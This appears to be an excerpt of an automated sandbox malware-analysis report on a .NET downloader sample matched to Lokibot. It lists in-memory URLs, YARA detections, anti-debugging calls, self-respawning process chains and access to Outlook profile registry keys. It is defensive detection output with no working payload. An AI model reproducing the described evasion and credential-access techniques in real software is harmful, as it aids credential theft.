                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299231317.000000000315A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299231317.000000000315A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299231317.000000000315A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299231317.000000000315A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s180/0_GettyImages-1273716690.
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-1273716690
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299231317.000000000315A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s458/0_GettyImages-1273716690.
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299231317.000000000315A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s615/0_GettyImages-1273716690.
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299231317.000000000315A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299231317.000000000315A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s458/1_WhatsApp-Image-2021-03-
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299231317.000000000315A000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s615/1_WhatsApp-Image-2021-03-
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299231317.000000000315A000.00000004.00000001.sdmpString found in binary or memory: https://liverpooldabestteamoftheworld.com/liverpool-fc-news/features/steven-gerrard-liverpool-future
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299231317.000000000315A000.00000004.00000001.sdmpString found in binary or memory: https://liverpooldabestteamoftheworld.com4
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://reach-id.orbit.tm-awx.com/analytics.js.gz
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299315661.0000000003185000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://s2-prod.liverpool.com/
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://static.hotjar.com/c/hotjar-
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/andrew-robertson
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/curtis-jones
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/ozan-kabak
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299231317.000000000315A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/premier-league
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/sadio-mane
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299231317.000000000315A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/all-about/transfers
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299231317.000000000315A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-1996166
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-andy-robertson-valuable-quality-19946
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-curtis-jones-jurgen-klopp-19941053
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-1993836
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-19954616
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-sadio-mane-expected-goals-19932676
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299231317.000000000315A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-199590
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299231317.000000000315A000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/schedule/
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
                Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443

                System Summary:

                barindex
                Malicious sample detected (through community Yara rule)Show sources
                Source: 00000000.00000002.300582297.0000000004208000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000005.00000002.512379427.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000005.00000002.512379427.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.299347125.0000000003190000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.300559683.00000000041EE000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 5.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.41eeea0.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.41eeea0.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.41eeea0.6.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.41eeea0.6.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 5.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 5.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeCode function: 0_2_0303B8B0 NtSetInformationThread,
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeCode function: 0_2_0303C500 NtSetInformationThread,
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeCode function: 0_2_03032D68
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeCode function: 5_2_0040549C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeCode function: 5_2_004029D4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeCode function: String function: 00405B6F appears 42 times
                Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2576 -s 2120
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.297407601.0000000000ACC000.00000002.00020000.sdmpBinary or memory string: OriginalFilename0 vs SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299142713.0000000003121000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.300582297.0000000004208000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSjFH BCy.exe2 vs SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.302539282.0000000005460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.303302144.00000000061A0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.298842318.0000000003060000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dll.muij% vs SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.303627441.0000000006290000.00000002.00000001.sdmpBinary or memory string: originalfilename vs SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.303627441.0000000006290000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.301794257.0000000004B44000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPeBraba.dll6 vs SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.298818235.0000000003050000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dllj% vs SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000005.00000000.262146939.000000000069C000.00000002.00020000.sdmpBinary or memory string: OriginalFilename0 vs SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000005.00000002.512639003.00000000004A2000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameSjFH BCy.exe2 vs SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeBinary or memory string: OriginalFilename0 vs SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                Source: 00000000.00000002.300582297.0000000004208000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000005.00000002.512379427.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000005.00000002.512379427.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.299347125.0000000003190000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.300559683.00000000041EE000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-03-09
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 5.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 5.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-03-09
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.41eeea0.6.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-03-09
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.41eeea0.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.41eeea0.6.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.41eeea0.6.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-03-09
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.41eeea0.6.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.41eeea0.6.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 5.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 5.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/7@2/3
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeCode function: 5_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeCode function: 5_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeFile created: C:\Users\user\AppData\Local\?????????_IncJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1552:120:WilError_01
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2576
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERC8B4.tmpJump to behavior
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeVirustotal: Detection: 42%
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeReversingLabs: Detection: 17%
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe:Zone.IdentifierJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe'
                Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2576 -s 2120
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Source: Binary string: rsaenh.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: Microsoft.VisualBasic.pdb} source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: System.ni.pdb% source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: System.ni.pdb" source: WerFault.exe, 00000008.00000003.283574346.0000000005678000.00000004.00000001.sdmp
                Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 00000008.00000002.297027957.00000000058B0000.00000004.00000001.sdmp
                Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000008.00000003.271419527.0000000003392000.00000004.00000001.sdmp
                Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
                Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000008.00000003.283770641.0000000005630000.00000004.00000040.sdmp
                Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000008.00000003.283527112.0000000005661000.00000004.00000001.sdmp
                Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000008.00000003.283527112.0000000005661000.00000004.00000001.sdmp
                Source: Binary string: wntdll.pdb source: WerFault.exe, 00000008.00000003.271165162.0000000003386000.00000004.00000001.sdmp
                Source: Binary string: winnsi.pdb source: WerFault.exe, 00000008.00000003.283375349.000000000563E000.00000004.00000040.sdmp
                Source: Binary string: ml.pdb source: WerFault.exe, 00000008.00000003.283616934.000000000564C000.00000004.00000001.sdmp
                Source: Binary string: .ni.pdb source: WerFault.exe, 00000008.00000003.283616934.000000000564C000.00000004.00000001.sdmp
                Source: Binary string: clr.pdb source: WerFault.exe, 00000008.00000003.283770641.0000000005630000.00000004.00000040.sdmp
                Source: Binary string: cryptsp.pdb source: WerFault.exe, 00000008.00000003.283408755.000000000563B000.00000004.00000040.sdmp
